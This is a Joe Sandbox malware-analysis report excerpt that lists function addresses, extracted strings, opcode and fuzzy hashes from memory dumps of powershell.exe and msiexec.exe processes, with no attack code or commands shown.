Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: dde305afb23a3cd00e6e5c32d789a3de81172c656d807f891e57aef88e426ae4
Instruction ID: 127dec66fdc39bac0694ba32b0a7715a165f9395de516a062b2ac07b2e7ee81d
Opcode Fuzzy Hash: dde305afb23a3cd00e6e5c32d789a3de81172c656d807f891e57aef88e426ae4
Instruction Fuzzy Hash: 077139B27243178FD7258B69CA0866ABBF2EFC6711F14846BD405CF3A1DA32C845C7A1

Function 0727EF1C Relevance: 9.0, Strings: 7, Instructions: 206COMMON

Download Yara Rule

Strings

(dq, xrefs: 0727F1B0
tP^q, xrefs: 0727F081
(dq, xrefs: 0727F1A6
4'^q, xrefs: 0727F254
tP^q, xrefs: 0727F17C
(dq, xrefs: 0727F142
$^q, xrefs: 0727EFAD

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
API String ID: 0-1710924510
Opcode ID: d1ed618f9d09ba0e3d472e68ad09d25177e63aa031f74133a438b2245f39ae3a
Instruction ID: b7c8a7bcd6077b794483c88fae9525206b4d2df20b886918cc4378b2e6a4f0ac
Opcode Fuzzy Hash: d1ed618f9d09ba0e3d472e68ad09d25177e63aa031f74133a438b2245f39ae3a
Instruction Fuzzy Hash: ED71F8B5A28206DFCB24CE54C744B6AB7F2EF45311F19849AEC04AB394C771DD86CBA1

Function 0727EBCF Relevance: 8.9, Strings: 7, Instructions: 163COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727EE3E
TQcq, xrefs: 0727EC3A
$^q, xrefs: 0727EC5B
$^q, xrefs: 0727EC7C
$^q, xrefs: 0727EE0C
tP^q, xrefs: 0727ED4E
TQcq, xrefs: 0727EDE2

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
API String ID: 0-2461640029
Opcode ID: d8f5459b38f25d8f4ed6d78f7e3ab16399c6a63f0aceba5c1b04116f54c10031
Instruction ID: ed3e099502d4a0240877f9f7ed0d62015aca62e611d7e0c20f0bb1c804d5df55
Opcode Fuzzy Hash: d8f5459b38f25d8f4ed6d78f7e3ab16399c6a63f0aceba5c1b04116f54c10031
Instruction Fuzzy Hash: A751A3B5E30207DFDB288E05C74476677A5AF45711F1A88EAE8149F2A0C771DD84CBB1

Function 0727EBCB Relevance: 8.9, Strings: 7, Instructions: 145COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727EE3E
TQcq, xrefs: 0727EC3A
$^q, xrefs: 0727EC5B
$^q, xrefs: 0727EC7C
$^q, xrefs: 0727EE0C
tP^q, xrefs: 0727ED4E
TQcq, xrefs: 0727EDE2

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
API String ID: 0-2461640029
Opcode ID: 0841abe85d5dc164b90f8f11944c9457e4309eb6720171904540e8ed021581b3
Instruction ID: 04dc9fa118a9aed36e3d3845b43406a088e32817bde79621f6fa6e68f4847e56
Opcode Fuzzy Hash: 0841abe85d5dc164b90f8f11944c9457e4309eb6720171904540e8ed021581b3
Instruction Fuzzy Hash: A851A0F0E30207DFDB288E05C74476677A6AF45721F5A88EAE8158F2A0C771D884CBB1

Function 0727DCF0 Relevance: 7.7, Strings: 6, Instructions: 213COMMON

Download Yara Rule

Strings

$^q, xrefs: 0727DDF1
4'^q, xrefs: 0727DE0F
4'^q, xrefs: 0727DE1B
$^q, xrefs: 0727DF06
$^q, xrefs: 0727DDE1
$^q, xrefs: 0727DD96

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
API String ID: 0-3669853574
Opcode ID: 79e050366ccad6931a0dcf3aa6a3996276d2b25853293793a82af06923fc6a14
Instruction ID: 583a1a9affb1ef8a047af7be75bf34c6bfac3dc010e71a6d42517d42d91117b6
Opcode Fuzzy Hash: 79e050366ccad6931a0dcf3aa6a3996276d2b25853293793a82af06923fc6a14
Instruction Fuzzy Hash: D66148B272420BCFCB299E29C6446AABBF2AF85321F14C47AD409CF255DB31CC45C7A1

Function 0727E698 Relevance: 7.7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727E92F
d%dq, xrefs: 0727E8C5
$^q, xrefs: 0727E778
d%dq, xrefs: 0727E857
tP^q, xrefs: 0727E891
d%dq, xrefs: 0727E8BB

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
API String ID: 0-2098638132
Opcode ID: 558002e91609e53a6dddf2d5880eab16e5de5b32eda8419c6c51529df32f1c02
Instruction ID: b5c863a21b78b49c8d8cab8558e00be498194cbaffea7ca6713593b266def756
Opcode Fuzzy Hash: 558002e91609e53a6dddf2d5880eab16e5de5b32eda8419c6c51529df32f1c02
Instruction Fuzzy Hash: D051F5F1E24246DFCB24CE14C644B6ABBE2AF45350F1A84E9E8059F2A1DB71DD44CB71

Function 0727B928 Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

$^q, xrefs: 0727BAB2
$^q, xrefs: 0727BB0D
4'^q, xrefs: 0727BB48
$^q, xrefs: 0727BB1D
4'^q, xrefs: 0727BB3C

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 88ff5da66a91d110a11990e5646be49992e1cddfbd4886896aaca2a9dd8a19f2
Instruction ID: 9cd9087c85074c8cf795c6f8f0c0c73be7eb13e9e5735765a25f4c56966293b4
Opcode Fuzzy Hash: 88ff5da66a91d110a11990e5646be49992e1cddfbd4886896aaca2a9dd8a19f2
Instruction Fuzzy Hash: C2716BF0B2420BDFDB249E68DA446AAB7E2EF85310F24C479D8058F354DB32D945CB91

Function 0727EA18 Relevance: 6.4, Strings: 5, Instructions: 127COMMON

Download Yara Rule

Strings

$^q, xrefs: 0727EAD1
4'^q, xrefs: 0727EAF1
$^q, xrefs: 0727EA8B
4'^q, xrefs: 0727EAFD
$^q, xrefs: 0727EAC5

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 4b408828a755cc1f4192b476984b57237f006d37e5f58cd7835dcafdd3a080f0
Instruction ID: 496d1edf1594f044997279058aac09ce95493101e86250f4d8920c90e483c319
Opcode Fuzzy Hash: 4b408828a755cc1f4192b476984b57237f006d37e5f58cd7835dcafdd3a080f0
Instruction Fuzzy Hash: A14107B1F2431BCFCB248A698A5067BBBE5BF85210F2585FAD406C7245DA31C945C7B1

Function 07270538 Relevance: 6.4, Strings: 5, Instructions: 123COMMON

Download Yara Rule

Strings

$^q, xrefs: 072705C4
4'^q, xrefs: 07270626
4'^q, xrefs: 07270632
$^q, xrefs: 072705FD
$^q, xrefs: 07270609

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: e56ab03015e5fb49871ae95b4ed319ef0f66876841df09ba5a3d6c4d51073337
Instruction ID: a3ce97022c92ead2da2304ad54702463240b865212858664d2785b585709cd27
Opcode Fuzzy Hash: e56ab03015e5fb49871ae95b4ed319ef0f66876841df09ba5a3d6c4d51073337
Instruction Fuzzy Hash: 0A41D6F4B3020BDFDB349E25CA206BA7BA6AFC5210F54846ED5058B251DF32D989CB91

Function 0727A990 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

tP^q, xrefs: 0727AA8B
4'^q, xrefs: 0727AB3B
$^q, xrefs: 0727AB06
$^q, xrefs: 0727A9ED
$^q, xrefs: 0727AA09

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: 8c6d697de8e7becf44be1118b310aea9a30474213bbcde4869e4938f81dba149
Instruction ID: c865b8beb0646db5ac9ced7e7d2c466232044e2724e2fda88ab307a598eabefe
Opcode Fuzzy Hash: 8c6d697de8e7becf44be1118b310aea9a30474213bbcde4869e4938f81dba149
Instruction Fuzzy Hash: AF31A2B1A30207DFDB288E1DC744BAEB7F2AB95730F14C06AE8155B290CB71D985CB91

Function 0727E7DE Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727E92F
d%dq, xrefs: 0727E8C5
d%dq, xrefs: 0727E857
tP^q, xrefs: 0727E891
d%dq, xrefs: 0727E8BB

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
API String ID: 0-3846404929
Opcode ID: cc390dc3d05219e61b7dafe17f93243c72edd6db4682f36f82a7f6138372d828
Instruction ID: 525629ccd795a7310040a61b7945ca7bf4de3a02913cf7380c6afac327b6e2af
Opcode Fuzzy Hash: cc390dc3d05219e61b7dafe17f93243c72edd6db4682f36f82a7f6138372d828
Instruction Fuzzy Hash: B631E4B1F20219DFCB24CF58C640A5ABBA2BF88710F168599E805AF360C771DD41CBA0

Function 08BD0AD8 Relevance: 6.3, Strings: 5, Instructions: 79COMMON

Download Yara Rule

Strings

$^q, xrefs: 08BD0AF8
$^q, xrefs: 08BD0B4F
$^q, xrefs: 08BD0B14
$^q, xrefs: 08BD0B30
tP^q, xrefs: 08BD0B94

Memory Dump Source

Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: 1a4f3123d2b19ff3cc8adf90d4712fbd1cc665c8ae5b8dd3ee88403c476611f0
Instruction ID: ac8e4c55333b18f73bdb16b33bd5d54738a19c0e1233a4e582c8f0c4eda56940
Opcode Fuzzy Hash: 1a4f3123d2b19ff3cc8adf90d4712fbd1cc665c8ae5b8dd3ee88403c476611f0
Instruction Fuzzy Hash: 8221E532A08F15EFCB249E64C944A69B7F4EF4071AF2441AEEC049F251E731D906CF61

Function 08BD0AE0 Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

$^q, xrefs: 08BD0AF8
$^q, xrefs: 08BD0B4F
$^q, xrefs: 08BD0B14
$^q, xrefs: 08BD0B30
tP^q, xrefs: 08BD0B94

Memory Dump Source

Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: 418318e23e8f5cf10d49c94f0f30bda19e38f969bdefe27a209b4a855b638f75
Instruction ID: a2978cd4cee7834b2856bb9586701ff8f52afb7956e6d733cf80292cc606ad84
Opcode Fuzzy Hash: 418318e23e8f5cf10d49c94f0f30bda19e38f969bdefe27a209b4a855b638f75
Instruction Fuzzy Hash: B421D332A08F19EFCB24AE54C944A69B7F4EF40A1AF1440AEEC049F251E731D906CB61

Function 0727EA05 Relevance: 6.3, Strings: 5, Instructions: 76COMMON

Download Yara Rule

Strings

(dq, xrefs: 0727F1B0
(dq, xrefs: 0727F1A6
4'^q, xrefs: 0727F254
(dq, xrefs: 0727F142
tP^q, xrefs: 0727F17C

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$(dq$(dq$(dq
API String ID: 0-4083485116
Opcode ID: e289dfdc9bf155a1618700f1f22f5b67442ac258561a6826eff135f4f512660f
Instruction ID: c49d1ea976271be116a4b4b6ffa42f46f3dd35bc7e6df1b54e7d296dc5ade096
Opcode Fuzzy Hash: e289dfdc9bf155a1618700f1f22f5b67442ac258561a6826eff135f4f512660f
Instruction Fuzzy Hash: 082125B1B68206EFCB24CE58DB00B6B77A2AF89710F258459EC04AB394C671DC43CBD1

Function 0727BFFE Relevance: 5.4, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727C3D3
4'^q, xrefs: 0727C477
4'^q, xrefs: 0727C461
4'^q, xrefs: 0727C3BD

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: f4ea03527e0a7adc23126b2d17fbbcd60779f16bd09ec001eb0b34aa197dfc28
Instruction ID: c2d34b612c09d9920f6bff34da9e9c219116e2ca31dc44298a798f6636028416
Opcode Fuzzy Hash: f4ea03527e0a7adc23126b2d17fbbcd60779f16bd09ec001eb0b34aa197dfc28
Instruction Fuzzy Hash: 2E126BB4A002199FCB15DB24CD81B9EBBB2BB89304F5085E8D9096B755CB72EDC5CF90

Function 07278B58 Relevance: 5.4, Strings: 4, Instructions: 400COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07278DE9
4'^q, xrefs: 07278C39
4'^q, xrefs: 07278DF5
4'^q, xrefs: 07278C45

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: bb048ed4bb0b53077e82b9e6e5b431dbfb67578f49a131e7e17893a631b860ed
Instruction ID: cd97294ea3f5763c32f86a237336a57db629bf0f42fe2bde322a6a66af4f825e
Opcode Fuzzy Hash: bb048ed4bb0b53077e82b9e6e5b431dbfb67578f49a131e7e17893a631b860ed
Instruction Fuzzy Hash: 91D12CB1B2430ACFCB149B78D6496AABBE2AFCA310F14846AD505CF355DB32DC45C762

Function 08BD360A Relevance: 5.3, Strings: 4, Instructions: 324COMMON

Download Yara Rule

Strings

tP^q, xrefs: 08BD3868
tP^q, xrefs: 08BD3753
tP^q, xrefs: 08BD3874
tP^q, xrefs: 08BD3747

Memory Dump Source

Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$tP^q$tP^q
API String ID: 0-91886675
Opcode ID: 5d25766b4a20417eef7c0368b59b316503bd4ca852320f9e3f865d815e5775af
Instruction ID: 7360cdf0e8810c6dab0acecb4ed3c896cb85d17266bfb254ac030e88bc38b94b
Opcode Fuzzy Hash: 5d25766b4a20417eef7c0368b59b316503bd4ca852320f9e3f865d815e5775af
Instruction Fuzzy Hash: 78C18035B00309EFCB149F58D544A6ABBE2FB88711F1488A9E9159B352FB31DC46CBD2

Function 08BD11E0 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

tP^q, xrefs: 08BD13EC
tP^q, xrefs: 08BD12CF
tP^q, xrefs: 08BD13E0
tP^q, xrefs: 08BD12DB

Memory Dump Source

Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$tP^q$tP^q
API String ID: 0-91886675
Opcode ID: d88452468870cbc58b2efa8c5fb8723e4162c92cbf9ea9c2e584e08ffcf00045
Instruction ID: cc776a932fd875e4cceaf4fdeaf51095e10afafe8f79cd780706b7bf1923b128
Opcode Fuzzy Hash: d88452468870cbc58b2efa8c5fb8723e4162c92cbf9ea9c2e584e08ffcf00045
Instruction Fuzzy Hash: 2DA1A331B40318EFCB149F6CC544A6EFBE6EBC8711F1488A9E8159B355EA32DC46CB91

Function 07273060 Relevance: 5.3, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072731B9
tP^q, xrefs: 07273344
tP^q, xrefs: 07273350
4'^q, xrefs: 072731C5

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q
API String ID: 0-3859475322
Opcode ID: 664f355c2c567ef32c1c66dfbd8e00a41e1eb97ed46c2db7d4639b01ecdcc71f
Instruction ID: 6a273902b191c72796137901cf6564d9e52e6ba6e9327cba50942c2a551111e1
Opcode Fuzzy Hash: 664f355c2c567ef32c1c66dfbd8e00a41e1eb97ed46c2db7d4639b01ecdcc71f
Instruction Fuzzy Hash: 0F819CB1B20287DFDB24DA799A0476BBBE2AFC5310F14846AD411CB292DF71CC45D7A1

Function 07279DE8 Relevance: 5.2, Strings: 4, Instructions: 246COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07279EE6
4'^q, xrefs: 07279EF0
tP^q, xrefs: 0727A03C
tP^q, xrefs: 0727A048

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q
API String ID: 0-3859475322
Opcode ID: a7127926222c7c9dd0e99b90de17bf06805e7f1daa690fa9eda59e23e132c694
Instruction ID: 075d667b3cfcc3cbce4dd95d0c408dbdf58ee70faf7d5d2518e7a34e56ed4542
Opcode Fuzzy Hash: a7127926222c7c9dd0e99b90de17bf06805e7f1daa690fa9eda59e23e132c694
Instruction Fuzzy Hash: B1716AB17243468FC7248A68890177BBBA6EFC6310F18C87BD545CB751DA32D885C791

Function 072773D0 Relevance: 5.2, Strings: 4, Instructions: 221COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07277476
4'^q, xrefs: 07277480
tP^q, xrefs: 072775E4
tP^q, xrefs: 072775F0

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q
API String ID: 0-3859475322
Opcode ID: 24edfce9f838e4eb4d8a98d5ff270deea25e044ad36b71d8a46b9f71a7d9103d
Instruction ID: 119830c98f464cef1dcf3877bf260c8aaf46cc990572b05ce007ee1fc02ac5d2
Opcode Fuzzy Hash: 24edfce9f838e4eb4d8a98d5ff270deea25e044ad36b71d8a46b9f71a7d9103d
Instruction Fuzzy Hash: 997168B1B2030B8FCB249B689A067AABFB2AFC5310F14C47AD505CB355DB71C885C7A1

Function 0727B668 Relevance: 5.2, Strings: 4, Instructions: 209COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727B6F8
4'^q, xrefs: 0727B85D
4'^q, xrefs: 0727B702
4'^q, xrefs: 0727B869

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 3a11adb79efdcd9b739efab26887d7fff473468ca20330f071b17ff909bbe2d3
Instruction ID: d356eb269966f9e56040bf3aff7a62cf00373fdffeb5700234c57d798511ec7f
Opcode Fuzzy Hash: 3a11adb79efdcd9b739efab26887d7fff473468ca20330f071b17ff909bbe2d3
Instruction Fuzzy Hash: C061F5F6B2420BCFCB248E6D86156ABBBE1AFC6211F1484BFD405CB215DB31C985CB91

Function 0727AD64 Relevance: 5.1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

Strings

$^q, xrefs: 0727AE1B
$^q, xrefs: 0727ADD7
$^q, xrefs: 0727ADF3
$^q, xrefs: 0727AE37

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 0217b4a42b3ad5467ac0726527d06da02547ca06c9e2d533011c9afb66c8c76a
Instruction ID: 0cae1d4b1b596b658c2032bda962b9563d6f086c3c6d25301994dc66ada28792
Opcode Fuzzy Hash: 0217b4a42b3ad5467ac0726527d06da02547ca06c9e2d533011c9afb66c8c76a
Instruction Fuzzy Hash: DB3125B6A353479FCB258E68DA449AEBBB4EF45631F14C07BE8048B202DB32C545C791

Function 07279B40 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07279BA8
$^q, xrefs: 07279B9C
$^q, xrefs: 07279B52
$^q, xrefs: 07279B6E

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: d41e2ef2414b3798b78a14336f30bea492ee9394db955061617c6cc295956c79
Instruction ID: 45b36666e9333eddc23f3ac33a8d18251b4b3429320b4ade33a675f4792b5934
Opcode Fuzzy Hash: d41e2ef2414b3798b78a14336f30bea492ee9394db955061617c6cc295956c79
Instruction Fuzzy Hash: C4216BF133030B9BDB34996A9E40B3766DA9BC9711F24882E9485CF385CD76E884C761

Function 07270308 Relevance: 5.1, Strings: 4, Instructions: 66COMMON

Download Yara Rule

Strings

$^q, xrefs: 07270352
4'^q, xrefs: 07270373
$^q, xrefs: 0727035E
4'^q, xrefs: 0727037F

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 6d0a277b24a015d8c0a9d9e56543ed04b199779885000a593a1275be33b261b7
Instruction ID: 51b691c1e0ea64404b3a99f1c18e6e3d4020583b899cc6ca585075d60d9d4991
Opcode Fuzzy Hash: 6d0a277b24a015d8c0a9d9e56543ed04b199779885000a593a1275be33b261b7
Instruction Fuzzy Hash: 091148A1B2E3968FC73B12282A255A62FB61F8261031D009BE001CF797CD348C8DC3B3

Analysis Process: msiexec.exePID: 7864, Parent PID: 7460COMMON

Executed Functions

Function 20EEC146 Relevance: 6.5, Strings: 5, Instructions: 228COMMON

Download Yara Rule

Strings

LjAp, xrefs: 20EEC377
PH^q, xrefs: 20EEC3EF
0oAp, xrefs: 20EEC20A
LjAp, xrefs: 20EEC38D
PH^q, xrefs: 20EEC400

Memory Dump Source

Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 88428f3170723688cd3170b9854f5d0f9cb143efa8d78b2e840f83f1389f90c0
Instruction ID: 3a710daeded7d335f55a13d84b968043f6bd80c001078af9df8dd2a080814850
Opcode Fuzzy Hash: 88428f3170723688cd3170b9854f5d0f9cb143efa8d78b2e840f83f1389f90c0
Instruction Fuzzy Hash: 34A1E975E01218CFDB05CFAAD884A9DBBF2BF49314F10C0A9E518AB365DB349982CF50

Function 20EE5362 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

0oAp, xrefs: 20EE53E2
LjAp, xrefs: 20EE5550
PH^q, xrefs: 20EE55C8
PH^q, xrefs: 20EE55D9
LjAp, xrefs: 20EE5566

Memory Dump Source

Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 7227c34db93beeb5ac94288676a07e76b844ea0ebab51a42eaabcc6beb044f40
Instruction ID: f5eebb40cfdb31abe045c9df39c1359ade6eaa6cff0cca2c3b0d05ae1749aaba
Opcode Fuzzy Hash: 7227c34db93beeb5ac94288676a07e76b844ea0ebab51a42eaabcc6beb044f40
Instruction Fuzzy Hash: 0A91E475E00218CFDB14CFAAD984A9DBBF2BF88310F14C069E819AB365DB349985CF50

Function 20EEC468 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

PH^q, xrefs: 20EEC6BF
PH^q, xrefs: 20EEC6D0
LjAp, xrefs: 20EEC647
LjAp, xrefs: 20EEC65D
0oAp, xrefs: 20EEC4DA

Memory Dump Source

Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 6e8a1df378700c3d80be62ee042f087d0c28cfaac28db1da171f28a559d11568
Instruction ID: 03cce658a2be599cc27a1877000710acd595e5a9d7c68fcf6fc57d94545fccc6
Opcode Fuzzy Hash: 6e8a1df378700c3d80be62ee042f087d0c28cfaac28db1da171f28a559d11568
Instruction Fuzzy Hash: 7F81C374E00218DFDB15DFAAD984A9DBBF2BF88314F20D069E418AB365DB349985CF50

Function 20EED278 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

PH^q, xrefs: 20EED4CF
PH^q, xrefs: 20EED4E0
LjAp, xrefs: 20EED46D
0oAp, xrefs: 20EED2EA
LjAp, xrefs: 20EED457

Memory Dump Source

Source File: 00000004.00000002.2931683628.0000000020EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ee0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 4af03df2aaed8a578e905a319da5f243088b11a082db4d240acf26c89272058f
Instruction ID: 06d42bf9a7bd0ca993f24e4a9ef52de1c9b83b8dadf291eecd6948216c266076
Opcode Fuzzy Hash: 4af03df2aaed8a578e905a319da5f243088b11a082db4d240acf26c89272058f
